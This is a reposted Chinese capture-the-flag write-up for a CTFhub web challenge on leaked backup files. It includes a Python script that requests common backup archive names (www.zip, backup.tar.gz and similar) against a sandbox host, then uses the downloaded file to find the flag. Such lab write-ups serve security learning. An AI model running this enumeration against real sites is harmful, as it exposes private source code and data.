CTFhub-网站源码

发布时间：2024年01月21日

CTFhub-Web-信息泄露-备份文件下载-网站源码

题目信息

在这里插入图片描述

解题过程

无脑爆破（笑
写个python脚本


import requests
#这里的url是你的地址
url = "http://challenge-67a05a3755f2610d.sandbox.ctfhub.com:10800/"

list1 = ['web', 'website', 'backup', 'back', 'www', 'wwwroot', 'temp']
list2 = ['tar', 'tar.gz', 'zip', 'rar']
for i in list1:
    for j in list2:
        url_final = url + "/" + i + "." + j
        r = requests.get(url_final)
        print(str(r) + "+" + url_final)

运行后得到结果：
在这里插入图片描述
下载这个zip,得到
![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/023473b8f4c445799b4e7dfff70438df.png
点开txt发现啥都没有，把这个文件名放到刚刚的网址后得到：

这里就是我们需要的flag!

文章来源:https://blog.csdn.net/weixin_39579781/article/details/135733660
本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若内容造成侵权/违法违规/事实不符，请联系我的编程经验分享网邮箱：chenni525@qq.com进行投诉反馈，一经查实，立即删除！